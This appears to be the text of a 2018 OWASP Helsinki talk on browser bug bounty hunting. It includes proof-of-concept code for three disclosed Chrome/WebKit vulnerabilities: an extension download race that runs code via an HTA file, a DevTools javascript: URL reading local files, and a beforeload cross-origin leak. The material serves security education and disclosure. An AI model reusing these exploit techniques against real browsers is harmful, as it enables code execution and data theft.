Hunting for Bounties in a Web Browser

OWASP Helsinki #35

Juho Nurminen

2018-11-06

Who?

Specialist @ 2NS

Hacking browsers since ~2011

A whole bunch of VRPs

Why web browsers?

Complex software + Huge attack surface + Open Source + Excellently managed VRPs + Better-than-average rewards + Real impact

= Fierce competition, but enough bugs for everyone

The approach

Understand the tech

Knowing web technologies and JavaScript helps

As does knowing extension and plugin APIs

Also browser DevTools, W3C standards, PDF, Flash, NaCl, WebAssembly, ...

Focus on what you know

Stay on top of things

https://crbug.com/

https://bugzilla.mozilla.org/

https://www.chromestatus.com/features

https://mdn.io/

Read up on prior art

What's already been looked at? What hasn't?

What's already been fixed? Are the fixes good enough?

Has a bug been reopened repeatedly?

Can you repro an old bug in some other context?

Or, idk, maybe just write something for ClusterFuzz

¯\_(ツ)_/¯

Bugs, bugs, bugs

CVE-2018-6033

Extension code can execute downloaded files

Race condition in anti-malware hook

⇒ No MOTW ⇒ No OS or browser warnings

⇒ Full RCE + SBX in Chrome ≤ 63

CVE-2018-6033

chrome.browserAction.onClicked.addListener(tab => {
  var downloadId;

  chrome.downloads.download({
    url: "data:,",
    filename: "shell.hta",
    conflictAction: "overwrite"
  }, id => downloadId = id);

  chrome.downloads.download({
    url: "data:,<script>(new ActiveXObject('WScript.shell')).run('calc')</script><!--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------->",
    filename: "shell.hta",
    conflictAction: "overwrite"
  });

  setTimeout(_ => chrome.downloads.open(downloadId), 500);
});

CVE-2018-6039

XSS vulnerability in DevTools

Privileged APIs can be overwritten

⇒ Remote filesystem access in Chrome ≤ 63

CVE-2018-6039

chrome-devtools://devtools/remote/serve_rev/@199588/devtools.html?remoteFrontendUrl=javascript:w=open("devtools.html");w.onload=_=>w.eval(`DevToolsAPI.streamWrite=(e,o)=>document.write(o);DevToolsAPI.sendMessageToEmbedder("loadNetworkResource",["file:///C:/","",0]);`)

w = open("devtools.html");
w.onload = _ => w.eval(`
    DevToolsAPI.streamWrite = (e,o) => document.write(o);
    DevToolsAPI.sendMessageToEmbedder(
      "loadNetworkResource", [ "file:///C:/", "", 0]);
  `)

CVE-2011-2800

WebKit 'beforeload' event leaks data across origins

Malicious page can read the target of any redirection in a frame

⇒ Authentication tokens, usernames exposed in Chrome ≤ 13

⇒ Also Safari < 5.1.1 (OS X, Windows), iOS < 5, ...

CVE-2011-2800

<iframe
  src="http://ssl.gstatic.com/chrome/webstore/html/bounce.html#continue=https%3A%2F%2Fchrome.google.com%2Fwebstore%2F"
  onbeforeload="alert('Now opening ' + event.url)">
</iframe>

<iframe
  src="https://www.facebook.com/me"
  onbeforeload="alert('Now opening ' + event.url)">
</iframe>

Summary

1. Pwn things

2. Post on crbug.com/new

Hunting for Bounties in a Web Browser

OWASP Helsinki #35

Juho Nurminen

2018-11-06

Who?

Why web browsers?

The approach

Understand the tech

Focus on what you know

Stay on top of things

Read up on prior art

Or, idk, maybe just write something for ClusterFuzz

Bugs, bugs, bugs

CVE-2018-6033

CVE-2018-6033

CVE-2018-6039

CVE-2018-6039

CVE-2011-2800

CVE-2011-2800

Summary

1. Pwn things

2. Post on crbug.com/new

4. Profit

That's it, thanks :)